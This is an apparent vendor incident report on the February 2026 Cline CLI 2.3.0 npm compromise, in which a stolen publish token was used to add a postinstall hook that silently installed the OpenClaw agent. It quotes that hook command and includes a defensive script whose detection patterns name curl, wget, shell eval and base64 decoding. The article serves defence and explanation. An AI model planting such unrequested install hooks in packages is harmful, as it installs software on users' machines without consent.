Cline CLI Supply Chain Attack Installs OpenClaw
Key Takeaways
- Attackers used a compromised npm publish token to release Cline CLI version 2.3.0 with an unauthorized post-install hook.
- The modified release silently installed the open-source autonomous AI agent OpenClaw on affected systems.
- The malicious version remained available for approximately eight hours, with around 4,000 downloads before removal.
- Cline maintainers revoked the compromised token and released version 2.4.0 with OIDC publishing hardening.
- OpenClaw itself was not malicious, but the unauthorized installation demonstrates the risk of supply chain compromise in AI tooling.
Supply Chain Attack Delivers AI Agent via Cline CLI
On February 17, 2026, an unauthorized actor used a stolen npm publish token to upload a tampered version of the open-source Cline CLI (version 2.3.0) to the npm registry. Users who installed or upgraded to this release had the OpenClaw autonomous AI agent automatically installed on their systems due to a malicious post-install script added to the package. Reporting indicates the compromised release was available for approximately eight hours and was downloaded an estimated 4,000 times before it was deprecated and replaced by version 2.4.0. (Cyber Security News)
Cline CLI is a widely adopted open-source AI coding assistant that integrates AI models into developer workflows. OpenClaw is an autonomous AI agent capable of executing tasks via LLM backends, and while not classified as malware, its silent installation highlights emerging risks as AI agents proliferate throughout development ecosystems.
How the Breach Happened
The actor exploited a compromised npm publish token associated with the Cline project to push an unauthorized release to npm. Rather than altering the core CLI binary, the attacker added a post-install script to the package.json that executed:
npm install -g openclaw@latest
This script caused OpenClaw to be globally installed when a developer ran npm install cline@2.3.0. The remainder of the package was otherwise identical to legitimate code.
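The hook described above is the kind of change a pre-install gate can catch. As an added example (not Cline's or OpenClaw's code), the Node.js check below audits a package.json for install-time lifecycle hooks, diffs them against a known-good release, and blocks an upgrade when a hook was added or changed and its command trips a risky pattern; the baseline package.json and its version string are constructed placeholders, and the candidate mirrors the postinstall command the article reports.

```javascript
// Added defensive example (not Cline's or OpenClaw's code): audit npm lifecycle
// hooks before installing or upgrading a package, and diff them against a known-good
// release so that a newly introduced postinstall hook is caught rather than executed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Command shapes a defender would treat as high-signal inside an install hook.
const RISKY_PATTERNS = [
  { name: "global-install", re: /\bnpm\s+(?:i|install|add)\b.*(?:\s-g\b|--global\b)/ },
  { name: "remote-fetch",   re: /\b(?:curl|wget)\b/ },
  { name: "shell-eval",     re: /\b(?:sh|bash)\s+-c\b|\beval\b/ },
  { name: "inline-node",    re: /\bnode\s+-e\b/ },
  { name: "base64-decode",  re: /\bbase64\s+(?:-d|--decode)\b/ },
];

// Report every lifecycle hook in a package.json object and which patterns it trips.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => {
      const matched = RISKY_PATTERNS.filter((p) => p.re.test(scripts[hook])).map((p) => p.name);
      return { pkg: `${pkg.name}@${pkg.version}`, hook, command: scripts[hook], matched, risky: matched.length > 0 };
    });
}

// List lifecycle hooks that were added, removed or changed between two releases.
function diffLifecycleScripts(basePkg, candidatePkg) {
  const base = (basePkg && basePkg.scripts) || {};
  const cand = (candidatePkg && candidatePkg.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => base[hook] !== cand[hook])
    .map((hook) => ({ hook, before: base[hook] ?? null, after: cand[hook] ?? null }));
}

// Gate an upgrade: block if a hook was added or changed and its new command is risky.
function shouldBlockUpgrade(basePkg, candidatePkg) {
  const changedHooks = new Set(diffLifecycleScripts(basePkg, candidatePkg).map((c) => c.hook));
  const reasons = auditLifecycleScripts(candidatePkg)
    .filter((f) => f.risky && changedHooks.has(f.hook))
    .map((f) => `${f.hook}: "${f.command}" (${f.matched.join(", ")})`);
  return { block: reasons.length > 0, reasons };
}

// Constructed samples. The baseline is a placeholder for the prior, untampered release
// (its version string is invented); the candidate mirrors the hook the article describes.
const BASELINE_PKG = { name: "cline", version: "2.2.0-baseline-sample", scripts: { build: "tsc" } };
const TAMPERED_PKG = { name: "cline", version: "2.3.0",
  scripts: { build: "tsc", postinstall: "npm install -g openclaw@latest" } };

console.log(JSON.stringify(shouldBlockUpgrade(BASELINE_PKG, TAMPERED_PKG), null, 2));
```

Running this against a tarball's package.json (for example, one fetched with npm pack before installing) turns a silent hook into a blocked upgrade with a stated reason; it complements, rather than replaces, installing with ignore-scripts enabled.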
The root of the compromise has been linked to earlier prompt injection research that exposed weaknesses in automated workflows processing issue titles, though the precise chain of exploitation remains under investigation. Prompt injection and automation configuration issues can allow attackers to escalate from untrusted input to production deployment keys when governance controls are insufficient. (The Verge)
Cline maintainers responded by revoking the compromised publish token, deprecating the malicious release, and updating the npm publishing pipeline to use OpenID Connect (OIDC) provenance via GitHub Actions to improve artifact trust verification.
Why It Matters
This incident demonstrates how software supply chain attacks can propagate AI agents unintentionally through trusted developer tooling. A compromised publishing credential bypassed standard release safeguards to install an autonomous agent on developer machines and potentially build pipelines. Autonomous AI agents such as OpenClaw can have broad permissions and persistent execution capability, so even an unauthorized installation that carries no payload of its own is a potential vector for elevated risk.
Although this specific instance did not involve destructive payloads, the event reveals how agent installation can occur without user intent, underscoring the importance of securing release credentials and verifying artifact provenance. Supply chain attacks in AI contexts can blend classical vulnerabilities with new vectors like prompt injection and automation trust assumptions, increasing both complexity and potential impact.
PointGuard AI Perspective
The Cline CLI supply chain attack underscores why AI discovery and supply chain visibility are critical for securing AI-assisted development environments and the broader software ecosystem.
PointGuard AI continuously discovers AI tools, agents, and integrations across development pipelines, third-party services, and build workflows. By generating an AI Bill of Materials (AI-BOM) that includes autonomous agents, package managers, and agentic tooling, organizations gain actionable visibility into where untrusted or unauthorized AI components may infiltrate critical systems.
Identifying where AI assistants operate with elevated privilege and interact with automated release processes enables proactive governance, artifact verification, and remediation before unauthorized AI agent installation translates into broader compromise. The Cline incident amplifies the need for provable provenance, credential hygiene, and deterministic supply chain controls as part of any secure AI adoption strategy.
Incident Scorecard Details
Total AISSI Score: 7.1 / 10
Criticality = 7 — Unauthorized AI agent installation through trusted developer tooling.
Propagation = 7 — The supply chain exploit spread through npm registry and developer environments.
Exploitability = 6 — Exploitation occurred over a brief window with a known compromised token.
Supply Chain = 8 — Critical dependency on npm publishing credentials and lack of strong artifact provenance.
Business Impact = 6 — No destructive payload, but persistent AI agent installation raises risk exposure.
Sources
- Dark Reading: Supply chain attack secretly installs OpenClaw for Cline users.
- Cyber Security News: AI Dev Tool Cline's npm Token Hijacked by Hackers.
- Awesome Agents: Cline CLI compromise coverage.
- Wikipedia: OpenClaw background (autonomous AI agent).
